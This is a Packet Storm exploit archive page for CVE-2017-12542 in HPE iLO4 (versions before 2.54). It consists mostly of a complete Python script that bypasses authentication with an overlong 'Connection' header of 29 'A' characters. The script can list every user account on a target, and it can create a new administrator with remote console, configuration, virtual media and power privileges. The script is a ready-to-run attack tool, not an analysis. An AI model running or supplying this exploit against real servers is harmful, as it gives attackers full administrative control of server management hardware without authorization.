exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

HPE iLO4 Add New Administrator User

HPE iLO4 Add New Administrator User
Posted Feb 8, 2018
Authored by skelsec

HPE iLO4 versions prior to 2.54 add new administrator user exploit.

tags | exploit
advisories | CVE-2017-12542
SHA-256 | 350446ace84a527655160a8fc8584b4707b9244e7bb4214a39fcb0b688a8239e

HPE iLO4 Add New Administrator User

Change Mirror Download
#!/usr/bin/env python

"""
Exploit trigger was presented @reconbrx 2018

Vulnerability found and documented by synacktiv:
https://www.synacktiv.com/posts/exploit/rce-vulnerability-in-hp-ilo.html

Original advisory from HP:
https://support.hpe.com/hpsc/doc/public/display?docId=hpesbhf03769en_us

Other advisories for this CVE:
https://tools.cisco.com/security/center/viewAlert.x?alertId=54930
https://securitytracker.com/id/1039222

IMPORTANT:
THIS EXPLOIT IS JUST FOR ONE OUT OF THE THREE VULNERABILITES COVERED BY CVE-2017-12542!!!
The two other vulns are critical as well, but only triggerable on the host itself.


"""

import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning
import json
import urllib3

#all of the HP iLO interfaces run on HTTPS, but most of them are using self-signed SSL cert
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

exploit_trigger = {'Connection' : 'A'*29}
accounts_url = 'https://%s/rest/v1/AccountService/Accounts'



def test(ip):

url = accounts_url % ip
try:
response = requests.get(url, headers = exploit_trigger, verify = False)
except Exception as e:
return False, 'Could not connect to target %s, Reason: %s' % (ip, str(e))

try:
data = json.loads(response.text)
except Exception as e:
return False, 'Target response not as exected!, Exception data: %s' % (str(e),)

return True, data

def exploit(ip, username, password):
Oem = {
'Hp' : {
'LoginName' : username,
'Privileges': {
'LoginPriv' : True,
'RemoteConsolePriv': True,
'UserConfigPriv' : True,
'VirtualMediaPriv': True,
'iLOConfigPriv':True,
'VirtualPowerAndResetPriv':True,
}
}
}
body = {
'UserName':username,
'Password':password,
'Oem':Oem
}
url = accounts_url % ip



try:
response = requests.post(url, json=body, headers = exploit_trigger, verify = False)
except Exception as e:
return False, 'Could not connect to target %s, Reason: %s' % (ip, str(e))

if response.status_code in [requests.codes.ok, requests.codes.created]:
return True, response.text
else:
return False, 'Server returned status code %d, data: %s' % (response.status_code, response.text)

if __name__ == '__main__':
import argparse
import sys
parser = argparse.ArgumentParser(description='CVE-2017-12542 Tester and Exploiter script.')
parser.add_argument('ip', help='target IP')
parser.add_argument('-t', action='store_true', default=True, help='Test. Trigger the exploit and list all users')
parser.add_argument('-e', action='store_true', default=False, help='Exploit. Create a new admin user with the credentials specified in -u and -p')
parser.add_argument('-u', help='username of the new admin user')
parser.add_argument('-p', help='password of the new admin user')

args = parser.parse_args()

if args.e:
if args.u is None or args.p is None:
print('Username and password must be set for exploiting!')
sys.exit()
res, data = exploit(args.ip, args.u, args.p)
if res:
print('[+] Sucsessfully added user!')
else:
print('[-] Error! %s' % data)

elif args.t:
res, data = test(args.ip)
if res:
print('[+] Target is VULNERABLE!')
for i in data['Items']:
print('[+] Account name: %s Username: %s' % (i['Name'], i['Oem']['Hp']['LoginName']))
else:
print('[-] Error! %s' % data)

Login or Register to add favorites

File Archive:

July 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    52 Files
  • 2
    Jul 2nd
    0 Files
  • 3
    Jul 3rd
    0 Files
  • 4
    Jul 4th
    0 Files
  • 5
    Jul 5th
    0 Files
  • 6
    Jul 6th
    0 Files
  • 7
    Jul 7th
    0 Files
  • 8
    Jul 8th
    0 Files
  • 9
    Jul 9th
    0 Files
  • 10
    Jul 10th
    0 Files
  • 11
    Jul 11th
    0 Files
  • 12
    Jul 12th
    0 Files
  • 13
    Jul 13th
    0 Files
  • 14
    Jul 14th
    0 Files
  • 15
    Jul 15th
    0 Files
  • 16
    Jul 16th
    0 Files
  • 17
    Jul 17th
    0 Files
  • 18
    Jul 18th
    0 Files
  • 19
    Jul 19th
    0 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close